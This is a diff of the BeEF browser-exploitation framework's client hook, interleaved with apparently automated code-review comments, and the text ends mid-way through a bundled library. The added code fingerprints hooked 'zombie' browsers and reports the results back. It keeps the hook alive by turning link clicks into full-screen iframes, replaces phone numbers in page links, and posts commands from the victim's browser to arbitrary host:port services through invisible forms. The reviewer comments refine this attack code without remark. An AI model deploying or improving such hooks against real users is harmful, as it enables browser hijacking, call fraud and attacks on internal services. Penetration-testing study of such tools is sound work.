@@ -540,17 +643,45 @@ beef.browser = { }, /** - * Checks if the zombie has Java enabled. + * Checks if the zombie has Java enabled. * @return: {Boolean} true or false. - * - * @example: if(beef.browser.javaEnabled()) { ... } - */ + * + * @example: if(beef.browser.javaEnabled()) { ... } + */ javaEnabled: function() { return (!!window.navigator.javaEnabled()); }, + /** + * Checks if the Phonegap API is available from the hooked domain. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasPhonegap()) { ... } + */ + hasPhonegap: function() { + var result = false; + try { if (!!device.phonegap) result = true; else result = false; } + catch(e) { result = false; } + return result; + }, + + /** + * Checks if the browser supports CORS + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasCors()) { ... } + */ + hasCors: function() { + if ('withCredentials' in new XMLHttpRequest()) + return true; + else if (typeof XDomainRequest !== "undefined") + return true; + else + return false; + }, + /** * Checks if the zombie has Java installed and enabled. * @return: {Boolean} true or false. @@ -564,7 +695,7 @@ beef.browser = { return false; } - // This is a temporary fix as this does not work on Safari and Chrome + // This is a temporary fix as this does not work on Safari and Chrome // Chrome requires manual user intervention even with unsigned applets. // Safari requires a few seconds to load the applet. if (beef.browser.isC() || beef.browser.isS()) { @@ -586,7 +717,6 @@ beef.browser = { } catch(e) { return false; } - return false; }, /** 
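Review bot: `hasCors` evaluates `new XMLHttpRequest()` before it tests `XDomainRequest`, so a browser with no native `XMLHttpRequest` constructor throws a ReferenceError instead of returning false; IE6, which this file still detects through `isIE6`, is presumably such a case. Guard the first test, `if (typeof XMLHttpRequest !== 'undefined' && 'withCredentials' in new XMLHttpRequest()) return true;`, after which the three-way `if/else` can become a single boolean return. In `hasPhonegap`, the `try` body's `if/else` that assigns `result` can be reduced to `return typeof device !== 'undefined' && !!device.phonegap;`, which also removes the need for the `catch`.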
@@ -765,6 +895,7 @@ beef.browser = { var browser_plugins = beef.browser.getPlugins(); var date_stamp = new Date().toString(); var os_name = beef.os.getName(); + var hw_name = beef.hardware.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); var screen_size = beef.browser.getScreenSize(); @@ -772,6 +903,7 @@ beef.browser = { var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; + var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No"; var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No"; var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No"; @@ -789,6 +921,7 @@ beef.browser = { if(hostport) details["HostPort"] = hostport; if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; + if(hw_name) details['Hardware'] = hw_name; if(date_stamp) details['DateStamp'] = date_stamp; if(system_platform) details['SystemPlatform'] = system_platform; if(browser_type) details['BrowserType'] = browser_type; @@ -797,6 +930,7 @@ beef.browser = { if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if(has_flash) details['HasFlash'] = has_flash + if(has_phonegap) details['HasPhonegap'] = has_phonegap if(has_web_socket) details['HasWebSocket'] = has_web_socket if(has_googlegears) details['HasGoogleGears'] = has_googlegears if(has_activex) details['HasActiveX'] = has_activex; 
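Review bot: The guard in `if(hw_name) details['Hardware'] = hw_name;` never skips, because `beef.hardware.getName()` as added in core/main/client/hardware.js returns the string 'Unknown' when nothing matches, so every report carries a `Hardware` key. Either drop the guard or test the sentinel, `if(hw_name && hw_name !== 'Unknown') details['Hardware'] = hw_name;`. Which is right depends on how the receiving handler treats a missing key, and that handler is not shown here. The enclosing function starts and ends outside these hunks.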
@@ -850,7 +984,7 @@ beef.browser = { * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket * */ hasWebSocket: function() { - if (!!window.WebSocket || !!window.MozWebSocket) return true; else return false; + return !!window.WebSocket || !!window.MozWebSocket; }, /** diff --git a/core/main/client/browser/cookie.js b/core/main/client/browser/cookie.js index d9b7cce98..8dcba9c97 100644 --- a/core/main/client/browser/cookie.js +++ b/core/main/client/browser/cookie.js 
@@ -1,110 +1,101 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.browser.cookie - * - * Provides fuctions for working with cookies. - * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php - * Original author unknown. - * - */ -beef.browser.cookie = { - - setCookie: function (name, value, expires, path, domain, secure) - { - - var today = new Date(); - today.setTime( today.getTime() ); - - if ( expires ) - { - expires = expires * 1000 * 60 * 60 * 24; - } - var expires_date = new Date( today.getTime() + (expires) ); - - document.cookie = name + "=" +escape( value ) + - ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + - ( ( path ) ? ";path=" + path : "" ) + - ( ( domain ) ? ";domain=" + domain : "" ) + - ( ( secure ) ? 
";secure" : "" ); - }, - - getCookie: function(name) - { - var a_all_cookies = document.cookie.split( ';' ); - var a_temp_cookie = ''; - var cookie_name = ''; - var cookie_value = ''; - var b_cookie_found = false; - - for ( i = 0; i < a_all_cookies.length; i++ ) - { - a_temp_cookie = a_all_cookies[i].split( '=' ); - cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); - if ( cookie_name == name ) - { - b_cookie_found = true; - if ( a_temp_cookie.length > 1 ) - { - cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); - } - return cookie_value; - break; - } - a_temp_cookie = null; - cookie_name = ''; - } - if ( !b_cookie_found ) - { - return null; - } - }, - - deleteCookie: function (name, path, domain) - { - if ( this.getCookie(name) ) document.cookie = name + "=" + - ( ( path ) ? ";path=" + path : "") + - ( ( domain ) ? ";domain=" + domain : "" ) + - ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; - }, - - hasSessionCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', '', '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - }, - - hasPersistentCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', 1, '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - } - -}; - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.browser.cookie + * + * Provides fuctions for working with cookies. + * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php + * Original author unknown. 
+ * + */ +beef.browser.cookie = { + + setCookie: function (name, value, expires, path, domain, secure) + { + + var today = new Date(); + today.setTime( today.getTime() ); + + if ( expires ) + { + expires = expires * 1000 * 60 * 60 * 24; + } + var expires_date = new Date( today.getTime() + (expires) ); + + document.cookie = name + "=" +escape( value ) + + ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + + ( ( path ) ? ";path=" + path : "" ) + + ( ( domain ) ? ";domain=" + domain : "" ) + + ( ( secure ) ? ";secure" : "" ); + }, + + getCookie: function(name) + { + var a_all_cookies = document.cookie.split( ';' ); + var a_temp_cookie = ''; + var cookie_name = ''; + var cookie_value = ''; + var b_cookie_found = false; + + for ( i = 0; i < a_all_cookies.length; i++ ) + { + a_temp_cookie = a_all_cookies[i].split( '=' ); + cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); + if ( cookie_name == name ) + { + b_cookie_found = true; + if ( a_temp_cookie.length > 1 ) + { + cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); + } + return cookie_value; + break; + } + a_temp_cookie = null; + cookie_name = ''; + } + if ( !b_cookie_found ) + { + return null; + } + }, + + deleteCookie: function (name, path, domain) + { + if ( this.getCookie(name) ) document.cookie = name + "=" + + ( ( path ) ? ";path=" + path : "") + + ( ( domain ) ? ";domain=" + domain : "" ) + + ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; + }, + + hasSessionCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', '', '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + }, + + hasPersistentCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', 1, '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? 
false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + } + +}; + beef.regCmp('beef.browser.cookie'); \ No newline at end of file diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js index bdea5eb35..0efd4aa8a 100644 --- a/core/main/client/browser/popup.js +++ b/core/main/client/browser/popup.js 
@@ -1,39 +1,30 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.browser.popup - * - * Provides fuctions for working with cookies. - * Several functions adopted from http://davidwalsh.name/popup-block-javascript - * Original author unknown. - * - */ -beef.browser.popup = { - - blocker_enbabled: function () - { - screenParams = beef.browser.getScreenSize(); - var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); - if (popUp == null || typeof(popUp)=='undefined') { - return true; - } else { - popUp.close(); - return false; - } - } -}; - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.browser.popup + * + * Provides fuctions for working with cookies. + * Several functions adopted from http://davidwalsh.name/popup-block-javascript + * Original author unknown. 
+ * + */ +beef.browser.popup = { + + blocker_enabled: function () + { + screenParams = beef.browser.getScreenSize(); + var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); + if (popUp == null || typeof(popUp)=='undefined') { + return true; + } else { + popUp.close(); + return false; + } + } +}; + beef.regCmp('beef.browser.popup'); diff --git a/core/main/client/dom.js b/core/main/client/dom.js index 387b514bf..bcebc904d 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.dom * 
@@ -117,6 +108,25 @@ beef.dom = { } return iframe; }, + + /** + * Load the link (href value) in an overlay foreground iFrame. + * The BeEF hook continues to run in background. + * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses + * Framebusting techniques, this will not work. + */ + persistentIframe: function(){ + $j('a').click(function(e) { + if ($j(this).attr('href') != '') + { + e.preventDefault(); + beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null); + $j(document).attr('title', $j(this).html()); + document.body.scroll = "no"; + document.documentElement.style.overflow = 'hidden'; + } + }); + }, /** * Create a form element with the specified parameters, appending it to the DOM if append == true @@ -194,6 +204,31 @@ beef.dom = { return count; }, + /** + * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number + * @param: {String} new_number: the new link telephone number to be written + * @param: {String} selector: the jquery selector statement to use, defaults to all a tags. + * @return: {Number} the amount of links found in the DOM and rewritten. + */ + rewriteTelLinks: function(new_number, selector) { + + var count = 0; + var re = new RegExp("tel:/?/?.*", "gi"); + var sel = (selector == null) ? 'a' : selector; + + $j(sel).each(function() { + if ($j(this).attr('href') != null) { + var url = $j(this).attr('href'); + if (url.match(re)) { + $j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; }); + count++; + } + } + }); + + return count; + }, + /** * Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}] 
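Review bot: The NOTE in the new doc comment for `persistentIframe` names X-Frame-Options and framebusting as what stops the overlay frame from loading, but a Content-Security-Policy with a `frame-ancestors` directive has the same effect in browsers that implement it. The comment should list it, for example `* NOTE: if the target link returns X-Frame-Options DENY/SAMEORIGIN, a CSP frame-ancestors restriction, or uses framebusting, this will not work.` The header values are also spelled `DENY` and `SAMEORIGIN`, not `deny/same-origin`. The block has no `@example` or `@return` line, so a reader cannot tell from the comment that the function returns nothing and only registers a click handler.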
@@ -315,6 +350,30 @@ beef.dom = { formXsrf.submit(); return iframeXsrf; + }, + + /** + * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation. + * @params: {String} rhost: remote host ip/domain + * @params: {String} rport: remote port + * @params: {String} commands: protocol commands to be executed by the remote host:port service + */ + createIframeIpecForm: function(rhost, rport, commands){ + var iframeIpec = beef.dom.createInvisibleIframe(); + + var formIpec = document.createElement('form'); + formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html'); + formIpec.setAttribute('method', 'POST'); + formIpec.setAttribute('enctype', 'multipart/form-data'); + + input = document.createElement('textarea'); + input.setAttribute('name', Math.random().toString(36).substring(5)); + input.value = commands; + formIpec.appendChild(input); + iframeIpec.contentWindow.document.body.appendChild(formIpec); + formIpec.submit(); + + return iframeIpec; } }; diff --git a/core/main/client/encode/base64.js b/core/main/client/encode/base64.js index 94246d82b..80df54fcf 100644 --- a/core/main/client/encode/base64.js +++ b/core/main/client/encode/base64.js 
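Review bot: `input = document.createElement('textarea');` in `createIframeIpecForm` assigns without `var`, so `input` becomes a global on the page the script runs in and can collide with page script or with a second call; the two variables beside it, `iframeIpec` and `formIpec`, are declared with `var`. Declare it the same way, `var input = document.createElement('textarea');`. The doc block also lacks a `@return` line although the function returns the iframe element.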
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662 beef.encode = {}; diff --git a/core/main/client/encode/json.js b/core/main/client/encode/json.js index 9a7a40c43..94fa8ba7a 100644 --- a/core/main/client/encode/json.js +++ b/core/main/client/encode/json.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/ beef.encode.json = { diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js index 0da30c433..66cc639d6 100644 --- a/core/main/client/geolocation.js +++ b/core/main/client/geolocation.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.geolocation * 
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
new file mode 100644
index 000000000..b56e30ab7
--- /dev/null
+++ b/core/main/client/hardware.js
@@ -0,0 +1,82 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.hardware = {
+
+ ua: navigator.userAgent,
+
+ isWinPhone: function() {
+ return (this.ua.match('(Windows Phone)')) ? true : false;
+ },
+
+ isIphone: function() {
+ return (this.ua.indexOf('iPhone') != -1) ? true : false;
+ },
+
+ isIpad: function() {
+ return (this.ua.indexOf('iPad') != -1) ? true : false;
+ },
+
+ isIpod: function() {
+ return (this.ua.indexOf('iPod') != -1) ? true : false;
+ },
+
+ isNokia: function() {
+ return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+ },
+
+ isBlackBerry: function() {
+ return (this.ua.match('BlackBerry')) ? true : false;
+ },
+
+ isZune: function() {
+ return (this.ua.match('ZuneWP7')) ? true : false;
+ },
+
+ isKindle: function() {
+ return (this.ua.match('Kindle')) ? true : false;
+ },
+
+ isHtc: function() {
+ return (this.ua.match('HTC')) ? true : false;
+ },
+
+ isEricsson: function() {
+ return (this.ua.match('Ericsson')) ? true : false;
+ },
+
+ isNokia: function() {
+ return (this.ua.match('Nokia')) ? true : false;
+ },
+
+ isMotorola: function() {
+ return (this.ua.match('Motorola')) ? true : false;
+ },
+
+ isGoogle: function() {
+ return (this.ua.match('Nexus One')) ? true : false;
+ },
+
+ getName: function() {
+
+ if (this.isNokia()) return 'Nokia';
+ if (this.isWinPhone()) return 'Windows Phone';
+ if (this.isBlackBerry()) return 'BlackBerry';
+ if (this.isIphone()) return 'iPhone';
+ if (this.isIpad()) return 'iPad';
+ if (this.isIpod()) return 'iPod';
+ if (this.isKindle()) return 'Kindle';
+ if (this.isHtc()) return 'HTC';
+ if (this.isMotorola()) return 'Motorola';
+ if (this.isZune()) return 'Zune';
+ if (this.isGoogle()) return 'Google';
+ if (this.isEricsson()) return 'Ericsson';
+
+ return 'Unknown';
+ }
+};
+
+beef.regCmp('beef.net.hardware');
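Review bot: The object literal defines `isNokia` twice; the later `return (this.ua.match('Nokia')) ? true : false;` replaces the earlier one, so the `(Maemo Browser)|(Symbian)|(Nokia)` pattern never runs and a Maemo or Symbian user agent without the word Nokia falls through to 'Unknown' in `getName`. Delete the second `isNokia` definition. The last line registers the component as `beef.regCmp('beef.net.hardware');` although the object is assigned to `beef.hardware`; it should presumably be `beef.regCmp('beef.hardware');`, since cookie.js and popup.js in this diff register under the name they assign. The file also has no `@literal object` header or per-method doc comments, unlike the other client files touched here.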
diff --git a/core/main/client/init.js b/core/main/client/init.js index dfd0f9dcc..2e87606a9 100644 --- a/core/main/client/init.js +++ b/core/main/client/init.js @@ -1,23 +1,18 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // -// if beef.pageIsLoaded is true, then this JS has been loaded >1 times -// and will have a new session id. The new session id will need to know -// the brwoser details. So sendback the browser details again. - +/** + * @literal object: beef.init + * Contains the beef_init() method which starts the BeEF client-side + * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object. + * + * If beef.pageIsLoaded is true, then this JS has been loaded >1 times + * and will have a new session id. The new session id will need to know + * the brwoser details. So sendback the browser details again. + */ BEEFHOOK = beef.session.get_hook_session_id(); if (beef.pageIsLoaded) { 
@@ -58,6 +53,13 @@ window.onclose = function (event) { } }; +/** + * Starts the polling mechanism, and initialize various components: + * - browser details (see browser.js) are sent back to the "/init" handler + * - the polling starts (checks for new commands, and execute them) + * - the logger component is initialized (see logger.js) + * - the Autorun Engine is initialized (see are.js) + */ function beef_init() { if (!beef.pageIsLoaded) { beef.pageIsLoaded = true; @@ -66,14 +68,13 @@ function beef_init() { beef.net.browser_details(); beef.updater.execute_commands(); beef.logger.start(); - - } - else { + beef.are.init(); + }else { beef.net.browser_details(); beef.updater.execute_commands(); beef.updater.check(); beef.logger.start(); + beef.are.init(); } - } } diff --git a/core/main/client/lib/browser_jools.js b/core/main/client/lib/browser_jools.js new file mode 100644 index 000000000..9668bb23d --- /dev/null +++ b/core/main/client/lib/browser_jools.js 
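Review bot: `beef.are.init();` is added to both arms of the `if/else` in `beef_init`, which now repeat four identical calls and differ only in `beef.updater.check();`. If nothing in the elided condition requires the split, the shared calls could be written once with only the check kept conditional, leaving a single `beef.are.init();` after `beef.logger.start();`; the condition line sits outside both hunks, so confirm that first. The new doc comment describes the Autorun Engine step, but the code calls `beef.are.init()` without testing that `beef.are` is defined, so the comment should say that are.js must be loaded before init.js.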
@@ -0,0 +1,1526 @@ +var require = function (file, cwd) { + var resolved = require.resolve(file, cwd || '/'); + var mod = require.modules[resolved]; + if (!mod) throw new Error( + 'Failed to resolve module ' + file + ', tried ' + resolved + ); + var res = mod._cached ? mod._cached : mod(); + return res; +} + +require.paths = []; +require.modules = {}; +require.extensions = [".js",".coffee"]; + +require._core = { + 'assert': true, + 'events': true, + 'fs': true, + 'path': true, + 'vm': true +}; + +require.resolve = (function () { + return function (x, cwd) { + if (!cwd) cwd = '/'; + + if (require._core[x]) return x; + var path = require.modules.path(); + cwd = path.resolve('/', cwd); + var y = cwd || '/'; + + if (x.match(/^(?:\.\.?\/|\/)/)) { + var m = loadAsFileSync(path.resolve(y, x)) + || loadAsDirectorySync(path.resolve(y, x)); + if (m) return m; + } + + var n = loadNodeModulesSync(x, y); + if (n) return n; + + throw new Error("Cannot find module '" + x + "'"); + + function loadAsFileSync (x) { + if (require.modules[x]) { + return x; + } + + for (var i = 0; i < require.extensions.length; i++) { + var ext = require.extensions[i]; + if (require.modules[x + ext]) return x + ext; + } + } + + function loadAsDirectorySync (x) { + x = x.replace(/\/+$/, ''); + var pkgfile = x + '/package.json'; + if (require.modules[pkgfile]) { + var pkg = require.modules[pkgfile](); + var b = pkg.browserify; + if (typeof b === 'object' && b.main) { + var m = loadAsFileSync(path.resolve(x, b.main)); + if (m) return m; + } + else if (typeof b === 'string') { + var m = loadAsFileSync(path.resolve(x, b)); + if (m) return m; + } + else if (pkg.main) { + var m = loadAsFileSync(path.resolve(x, pkg.main)); + if (m) return m; + } + } + + return loadAsFileSync(x + '/index'); + } + + function loadNodeModulesSync (x, start) { + var dirs = nodeModulesPathsSync(start); + for (var i = 0; i < dirs.length; i++) { + var dir = dirs[i]; + var m = loadAsFileSync(dir + '/' + x); + if (m) return m; + var n = 
loadAsDirectorySync(dir + '/' + x); + if (n) return n; + } + + var m = loadAsFileSync(x); + if (m) return m; + } + + function nodeModulesPathsSync (start) { + var parts; + if (start === '/') parts = [ '' ]; + else parts = path.normalize(start).split('/'); + + var dirs = []; + for (var i = parts.length - 1; i >= 0; i--) { + if (parts[i] === 'node_modules') continue; + var dir = parts.slice(0, i + 1).join('/') + '/node_modules'; + dirs.push(dir); + } + + return dirs; + } + }; +})(); + +require.alias = function (from, to) { + var path = require.modules.path(); + var res = null; + try { + res = require.resolve(from + '/package.json', '/'); + } + catch (err) { + res = require.resolve(from, '/'); + } + var basedir = path.dirname(res); + + var keys = (Object.keys || function (obj) { + var res = []; + for (var key in obj) res.push(key) + return res; + })(require.modules); + + for (var i = 0; i < keys.length; i++) { + var key = keys[i]; + if (key.slice(0, basedir.length + 1) === basedir + '/') { + var f = key.slice(basedir.length); + require.modules[to + f] = require.modules[basedir + f]; + } + else if (key === basedir) { + require.modules[to] = require.modules[basedir]; + } + } +}; + +require.define = function (filename, fn) { + var dirname = require._core[filename] + ? 
'' + : require.modules.path().dirname(filename) + ; + + var require_ = function (file) { + return require(file, dirname) + }; + require_.resolve = function (name) { + return require.resolve(name, dirname); + }; + require_.modules = require.modules; + require_.define = require.define; + var module_ = { exports : {} }; + + require.modules[filename] = function () { + require.modules[filename]._cached = module_.exports; + fn.call( + module_.exports, + require_, + module_, + module_.exports, + dirname, + filename + ); + require.modules[filename]._cached = module_.exports; + return module_.exports; + }; +}; + +if (typeof process === 'undefined') process = {}; + +if (!process.nextTick) process.nextTick = (function () { + var queue = []; + var canPost = typeof window !== 'undefined' + && window.postMessage && window.addEventListener + ; + + if (canPost) { + window.addEventListener('message', function (ev) { + if (ev.source === window && ev.data === 'browserify-tick') { + ev.stopPropagation(); + if (queue.length > 0) { + var fn = queue.shift(); + fn(); + } + } + }, true); + } + + return function (fn) { + if (canPost) { + queue.push(fn); + window.postMessage('browserify-tick', '*'); + } + else setTimeout(fn, 0); + }; +})(); + +if (!process.title) process.title = 'browser'; + +if (!process.binding) process.binding = function (name) { + if (name === 'evals') return require('vm') + else throw new Error('No such module') +}; + +if (!process.cwd) process.cwd = function () { return '.' }; + +if (!process.env) process.env = {}; +if (!process.argv) process.argv = []; + +require.define("path", function (require, module, exports, __dirname, __filename) { +function filter (xs, fn) { + var res = []; + for (var i = 0; i < xs.length; i++) { + if (fn(xs[i], i, xs)) res.push(xs[i]); + } + return res; +} + +// resolves . and .. 
elements in a path array with directory names there +// must be no slashes, empty elements, or device names (c:\) in the array +// (so also no leading and trailing slashes - it does not distinguish +// relative and absolute paths) +function normalizeArray(parts, allowAboveRoot) { + // if the path tries to go above the root, `up` ends up > 0 + var up = 0; + for (var i = parts.length; i >= 0; i--) { + var last = parts[i]; + if (last == '.') { + parts.splice(i, 1); + } else if (last === '..') { + parts.splice(i, 1); + up++; + } else if (up) { + parts.splice(i, 1); + up--; + } + } + + // if the path is allowed to go above the root, restore leading ..s + if (allowAboveRoot) { + for (; up--; up) { + parts.unshift('..'); + } + } + + return parts; +} + +// Regex to split a filename into [*, dir, basename, ext] +// posix version +var splitPathRe = /^(.+\/(?!$)|\/)?((?:.+?)?(\.[^.]*)?)$/; + +// path.resolve([from ...], to) +// posix version +exports.resolve = function() { +var resolvedPath = '', + resolvedAbsolute = false; + +for (var i = arguments.length; i >= -1 && !resolvedAbsolute; i--) { + var path = (i >= 0) + ? arguments[i] + : process.cwd(); + + // Skip empty and invalid entries + if (typeof path !== 'string' || !path) { + continue; + } + + resolvedPath = path + '/' + resolvedPath; + resolvedAbsolute = path.charAt(0) === '/'; +} + +// At this point the path should be resolved to a full absolute path, but +// handle relative paths to be safe (might happen when process.cwd() fails) + +// Normalize the path +resolvedPath = normalizeArray(filter(resolvedPath.split('/'), function(p) { + return !!p; + }), !resolvedAbsolute).join('/'); + + return ((resolvedAbsolute ? 
'/' : '') + resolvedPath) || '.'; +}; + +// path.normalize(path) +// posix version +exports.normalize = function(path) { +var isAbsolute = path.charAt(0) === '/', + trailingSlash = path.slice(-1) === '/'; + +// Normalize the path +path = normalizeArray(filter(path.split('/'), function(p) { + return !!p; + }), !isAbsolute).join('/'); + + if (!path && !isAbsolute) { + path = '.'; + } + if (path && trailingSlash) { + path += '/'; + } + + return (isAbsolute ? '/' : '') + path; +}; + + +// posix version +exports.join = function() { + var paths = Array.prototype.slice.call(arguments, 0); + return exports.normalize(filter(paths, function(p, index) { + return p && typeof p === 'string'; + }).join('/')); +}; + + +exports.dirname = function(path) { + var dir = splitPathRe.exec(path)[1] || ''; + var isWindows = false; + if (!dir) { + // No dirname + return '.'; + } else if (dir.length === 1 || + (isWindows && dir.length <= 3 && dir.charAt(1) === ':')) { + // It is just a slash or a drive letter with a slash + return dir; + } else { + // It is a full dirname, strip trailing slash + return dir.substring(0, dir.length - 1); + } +}; + + +exports.basename = function(path, ext) { + var f = 